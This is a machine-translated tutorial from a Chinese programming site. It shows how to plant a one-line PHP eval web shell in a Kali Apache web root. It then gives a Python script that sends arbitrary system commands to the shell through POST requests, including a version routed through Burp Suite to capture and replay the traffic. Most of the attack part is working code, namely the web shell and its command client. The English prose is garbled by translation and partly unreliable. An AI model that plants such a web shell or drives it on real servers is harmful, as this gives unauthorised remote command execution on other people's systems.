程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
您现在的位置: 程式師世界 >> 編程語言 >  >> 更多編程語言 >> Python

Use burpsuite to capture the post request of Python

編輯:Python

Catalog

      • Get ready web Environmental Science
      • Test code
      • test result
      • Use burpsuite Grab the bag

Get ready web Environmental Science

Kali Already there are Apache 了 , stay /etc Under the table of contents ls It will be displayed , So just configure it .( Use other here Linux or Windows Any virtual machine )

open apache Service related commands

/etc/init.d/apache2 start ( Turn on )
/etc/init.d/apache2 restart ( restart )
/etc/init.d/apache2 status ( Check the status )


Here it is Kali Enter Kali Of IP, It can be found that... Has been started apache.

stay Kali Of web Write a one sentence Trojan horse in the root directory , Here is to use PHP The Trojan horse .

<?php @eval($_POST['shell']);?>

shell Variable is used to receive python The string passed by the code .
eval() The function executes the received string as a command .

Test code

import requests
url = str(input(' The goal is URL:'))
passwd = str(input(' Connect the password :')) # In fact, it is a variable in the Trojan horse shell
cmd = str(input(' Carry out orders :'))
# Pass the command to the one sentence Trojan horse 
payload = {

passwd: "system(\'" + cmd + "\');"
}
# To the goal url send out post request 
response = requests.post(url=url, data=payload, timeout=3)
# Echo the results of command execution 
print(response.text)

test result



Use burpsuite Grab the bag


import requests
url = str(input(' The goal is URL:'))
passwd = str(input(' Connect the password :')) # In fact, it is a variable in the Trojan horse shell
cmd = str(input(' Carry out orders :'))
# Pass the command to the one sentence Trojan horse 
payload = {

passwd: "system(\'" + cmd + "\');"
}
# Use burpsuite Yes python Of post Please grab the bag 
proxy = {

'http': '127.0.0.1:8080',
'https': '127.0.0.1:8080'
}
# To the goal url send out post request 
response = requests.post(url=url, data=payload, proxies=proxy, timeout=3)
# Echo the results of command execution 
print(response.text)

Turn on burpsuite Grab the bag , function python Code .


Replay this post request .


Use burpsuite The built-in tool decodes


After decoding , give the result as follows .


take ls The order was changed to ifconfig command , give the result as follows .



  1. 上一篇文章:
  2. 下一篇文章:
Copyright © 程式師世界 All Rights Reserved